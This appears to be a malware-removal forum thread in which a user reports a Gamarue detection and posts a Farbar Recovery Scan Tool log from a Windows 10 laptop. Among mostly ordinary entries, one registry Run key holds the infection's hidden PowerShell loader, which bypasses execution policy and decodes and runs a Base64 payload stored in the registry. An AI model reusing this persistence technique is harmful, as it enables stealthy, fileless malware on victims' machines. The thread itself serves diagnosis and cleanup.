Pests of all kinds and how to fight them: Windows 10 - Gamarue
02.07.2017, 20:01 | #1 |
| Windows 10 - Gamarue Hello, I have received great help here in the forum before, so I would like to ask for your help again. For a few days now, Windows Defender has been reporting a detected virus; I did some research, and it sounds quite serious and persistent. I ran Windows Defender and then rebooted, but the virus is still there. I have read through everything so as to have all the necessary information ready; below are the logs from Farbar's Recovery Scan Tool and Windows Defender, plus two screenshots of the messages. What is still missing? What would my next steps be? Regards, Ararat |
02.07.2017, 20:02 | #2 |
| Windows 10 - Gamarue Farbar's Recovery Scan Tool
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2017 durchgeführt von ararat (Administrator) auf ARARAT-NOTEBOOK (02-07-2017 20:58:27) Gestartet von C:\Users\ararat\Desktop Geladene Profile: ararat (Verfügbare Profile: ararat & DefaultAppPool) Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser: "C:\Program Files\SRWare Iron (64-Bit)\chrome.exe" -- "%1") Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Lenovo.) C:\Windows\System32\ibmpmsvc.exe (Lenovo.) C:\Windows\System32\LPlatSvc.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe () C:\Windows\System32\nvwmi64.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe (Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe (Lenovo Group Limited) C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe (Intel Corporation) C:\Windows\System32\ibtsiva.exe (Autodesk Inc.) 
C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe (WIBU-SYSTEMS AG) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe (Lenovo Group Limited) C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe (Microsoft Corporation) C:\Windows\System32\mqsvc.exe (Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe (Synaptics Incorporated) C:\Windows\System32\valWbioSyncSvc.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe (Lenovo.) 
C:\Windows\System32\LPlatSvc.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynFP\Shared\SensorDBSynch.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tposd.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe (Synaptics) C:\Program Files\Synaptics\SynTP\SynLenovoHelper.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe (SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe (SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe (SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe (SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe (SRWare) C:\Program Files\SRWare Iron (64-Bit)\chrome.exe (Lenovo Group Limited) C:\Program 
Files\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe ==================== Registry (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation) HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1804432 2015-12-22] (NVIDIA Corporation) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated) HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [3486520 2017-06-26] (Dropbox, Inc.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation) HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated) HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [477064 2013-12-22] (Autodesk Inc.) 
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PrivacyIconClient.exe [1178912 2016-02-25] (Intel Corporation) HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0 HKLM\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [{C2956868-62F6-438A-A9BC-12CB233D69BF}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\BPMJBABA').nhnPLmKgFtez))); AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Keine Datei Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodeMeter Control Center.lnk [2016-02-23] ShortcutTarget: CodeMeter Control Center.lnk -> C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeterCC.exe (WIBU-SYSTEMS AG) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Netzwerk Server.lnk [2016-02-23] ShortcutTarget: Netzwerk Server.lnk -> C:\Program Files (x86)\WIBUKEY\Server\WkSvMgr.exe (WIBU-SYSTEMS AG) ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. 
Siehe Hosts-Bereich in Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{870c603a-60f8-4e24-9690-e4821fe96d21}: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{e862264f-fb30-45d1-a3f9-1bf499d21b67}: [DhcpNameServer] 192.168.2.1 Internet Explorer: ================== HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.netflix.com/ BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2016-02-23] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2016-02-23] (Oracle Corporation) FireFox: ======== FF DefaultProfile: pnaz2so4.default FF ProfilePath: C:\Users\ararat\AppData\Roaming\Mozilla\Firefox\Profiles\pnaz2so4.default [2016-03-28] FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2016-02-23] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2016-02-23] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D 
Vision\npnv3dv.dll [2015-11-05] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-11-05] (NVIDIA Corporation) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.) ==================== Dienste (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [576904 2013-12-22] (Autodesk Inc.) S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.) S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.) R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [49992 2017-06-26] (Dropbox, Inc.) R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373744 2016-11-02] (Intel Corporation) R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [57160 2017-06-05] (Lenovo Group Limited) S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [974632 2016-02-19] (Intel(R) Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [209184 2016-02-25] (Intel Corporation) R2 Lenovo Instant On; C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe [3124808 2017-04-28] (Lenovo Group Limited) R2 LPlatSvc; C:\WINDOWS\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.) 
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-06-02] (Lenovo) S4 McNeelUpdate; C:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe [68192 2013-12-07] (Robert McNeel & Associates) S3 mi-raysat_3dsmax2015_64; C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe [86016 2011-09-15] () [Datei ist nicht signiert] S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2017-02-13] () R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-01] (NVIDIA Corporation) R2 NVWMI; C:\Windows\system32\nvwmi64.exe [3180176 2015-12-22] () S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation) S3 SSSvc; C:\Program Files (x86)\SmartSense\SSSvc.exe [124752 2016-03-15] (Lenovo) S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Datei ist nicht signiert] R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [259176 2016-10-03] (Synaptics Incorporated) R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10351856 2016-12-15] (TeamViewer GmbH) R2 valWBFPolicyService; C:\WINDOWS\system32\valWBFPolicyService.exe [86544 2016-07-13] (Synaptics Incorporated) R2 valWbioSyncSvc; C:\WINDOWS\system32\valWbioSyncSvc.exe [56848 2016-07-13] (Synaptics Incorporated) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation) R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3743648 2017-02-13] (Intel® Corporation) R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] ===================== Treiber (Nicht auf der Ausnahmeliste) 
====================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) S3 blackberryncm; C:\WINDOWS\System32\drivers\blackberryncm6_AMD64.sys [36360 2016-04-06] (BlackBerry) R3 e1dexpress; C:\WINDOWS\system32\DRIVERS\e1d62x64.sys [519680 2015-12-08] (Intel Corporation) S1 hyoidxux; C:\WINDOWS\system32\drivers\hyoidxux.sys [55168 2017-07-02] (Microsoft Corporation) R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [244744 2017-04-13] (Intel Corporation) R0 IntelHSWPcc; C:\WINDOWS\System32\drivers\IntelPcc.sys [88256 2015-06-09] (Intel Corporation) R1 MpKsl337e8ef2; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{D599F7DF-B321-4635-993D-A80DB39C2EB7}\MpKsl337e8ef2.sys [44928 2017-07-02] (Microsoft Corporation) S3 NETwNs64; C:\WINDOWS\System32\drivers\Netwsw02.sys [3422472 2015-12-25] (Intel Corporation) R3 Netwtw04; C:\WINDOWS\system32\DRIVERS\Netwtw04.sys [7630072 2017-03-21] (Intel Corporation) R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvlddmkm.sys [14456920 2017-05-18] (NVIDIA Corporation) R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [423128 2013-07-24] (Realsil Semiconductor Corporation) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51296 2016-10-03] (Synaptics Incorporated) R1 SMIDriver; C:\WINDOWS\system32\DRIVERS\smi.sys [39488 2016-07-13] (Synaptics Incorporated) R3 SPUVCbv; C:\WINDOWS\System32\Drivers\SPUVCbv64.sys [749640 2016-07-01] (Sunplus Innovation Technology Inc.) 
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) R2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG) S1 fmqwrnmc; \??\C:\WINDOWS\system32\drivers\fmqwrnmc.sys [X] U3 idsvc; kein ImagePath ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-07-02 20:58 - 2017-07-02 20:58 - 00016006 _____ C:\Users\ararat\Desktop\FRST.txt 2017-07-02 20:58 - 2017-07-02 20:58 - 00000000 ____D C:\FRST 2017-07-02 20:45 - 2017-07-02 20:37 - 02435584 _____ (Farbar) C:\Users\ararat\Desktop\FRST64.exe 2017-07-02 20:43 - 2017-07-02 20:43 - 00001205 _____ C:\Users\ararat\Desktop\windows defender_information log.txt 2017-07-02 20:43 - 2017-07-02 20:43 - 00000873 _____ C:\Users\ararat\Desktop\windows defender_warning log.txt 2017-07-02 20:43 - 2017-07-02 20:43 - 00000424 _____ C:\Users\ararat\Desktop\windows defender_information log 2.txt 2017-07-02 20:37 - 2017-07-02 20:37 - 02435584 _____ (Farbar) C:\Users\ararat\Downloads\FRST64.exe 2017-07-02 20:19 - 2017-07-02 20:19 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hyoidxux.sys 2017-07-02 20:17 - 2017-07-02 20:17 - 00000000 ____H C:\ProgramData\cm-lock 2017-06-29 23:31 - 2017-06-29 23:32 - 00000000 ____D C:\Users\ararat\Desktop\3D Druck 2017-06-27 22:23 - 2017-06-27 22:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox 2017-06-27 21:01 - 2017-06-27 21:01 - 00000000 ____D 
C:\Users\ararat\AppData\Local\DBG 2017-06-26 12:27 - 2017-06-26 12:27 - 00049992 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe 2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys 2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys 2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys 2017-06-20 21:20 - 2017-06-20 21:20 - 00000000 ____D C:\WINDOWS\LastGood.Tmp 2017-06-18 10:32 - 2017-06-18 10:32 - 02373944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WudfUpdate_01011.dll 2017-06-14 20:30 - 2017-06-03 12:15 - 01596600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2017-06-14 20:30 - 2017-06-03 12:15 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-06-14 20:30 - 2017-06-03 12:15 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2017-06-14 20:30 - 2017-06-03 12:14 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-06-14 20:30 - 2017-06-03 12:14 - 01024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-06-14 20:30 - 2017-06-03 12:10 - 00130464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys 2017-06-14 20:30 - 2017-06-03 12:09 - 08318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-06-14 20:30 - 2017-06-03 12:09 - 01003624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2017-06-14 20:30 - 2017-06-03 12:08 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2017-06-14 20:30 - 2017-06-03 12:07 - 00923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2017-06-14 20:30 - 2017-06-03 12:07 - 00119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys 2017-06-14 20:30 - 2017-06-03 12:02 - 02444192 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-06-14 20:30 - 2017-06-03 12:01 - 05477096 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2017-06-14 20:30 - 2017-06-03 12:00 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll 2017-06-14 20:30 - 2017-06-03 12:00 - 00321376 _____ (Microsoft Corporation) C:\WINDOWS\system32\capauthz.dll 2017-06-14 20:30 - 2017-06-03 12:00 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys 2017-06-14 20:30 - 2017-06-03 11:59 - 01409048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2017-06-14 20:30 - 2017-06-03 11:59 - 00626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-06-14 20:30 - 2017-06-03 11:59 - 00311200 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2017-06-14 20:30 - 2017-06-03 11:59 - 00259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe 2017-06-14 20:30 - 2017-06-03 11:58 - 21352696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-06-14 20:30 - 2017-06-03 11:58 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2017-06-14 20:30 - 2017-06-03 11:58 - 00660384 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll 2017-06-14 20:30 - 2017-06-03 11:58 - 00254176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2017-06-14 20:30 - 2017-06-03 11:57 - 00371616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 02228120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 01693600 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 01458592 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\AppVEntSubsystemController.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 00848288 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 00846752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe 2017-06-14 20:30 - 2017-06-03 11:56 - 00844696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntStreamingManager.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 00697760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 00672672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll 2017-06-14 20:30 - 2017-06-03 11:56 - 00399264 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVScripting.dll 2017-06-14 20:30 - 2017-06-03 11:55 - 02681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2017-06-14 20:30 - 2017-06-03 11:36 - 01150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2017-06-14 20:30 - 2017-06-03 11:35 - 02259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-06-14 20:30 - 2017-06-03 11:28 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-06-14 20:30 - 2017-06-03 11:26 - 00266640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\capauthz.dll 2017-06-14 20:30 - 2017-06-03 11:23 - 20373920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-06-14 20:30 - 2017-06-03 11:23 - 06760024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2017-06-14 20:30 - 2017-06-03 11:23 - 00573856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll 2017-06-14 20:30 - 2017-06-03 11:21 - 01516448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppVEntSubsystems32.dll 2017-06-14 20:30 - 2017-06-03 11:20 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2017-06-14 20:30 - 2017-06-03 11:14 - 03673088 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\win32kfull.sys 2017-06-14 20:30 - 2017-06-03 11:14 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll 2017-06-14 20:30 - 2017-06-03 11:14 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll 2017-06-14 20:30 - 2017-06-03 11:14 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll 2017-06-14 20:30 - 2017-06-03 11:14 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2017-06-14 20:30 - 2017-06-03 11:12 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2017-06-14 20:30 - 2017-06-03 11:11 - 02958848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-06-14 20:30 - 2017-06-03 11:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2017-06-14 20:30 - 2017-06-03 11:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll 2017-06-14 20:30 - 2017-06-03 11:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2017-06-14 20:30 - 2017-06-03 11:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys 2017-06-14 20:30 - 2017-06-03 11:11 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll 2017-06-14 20:30 - 2017-06-03 11:10 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2017-06-14 20:30 - 2017-06-03 11:10 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe 2017-06-14 20:30 - 2017-06-03 11:10 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCredentialDeployment.exe 2017-06-14 20:30 - 2017-06-03 11:09 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll 2017-06-14 20:30 - 2017-06-03 11:09 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\devicengccredprov.dll 2017-06-14 20:30 - 2017-06-03 11:09 - 00094720 _____ (Microsoft Corporation) 
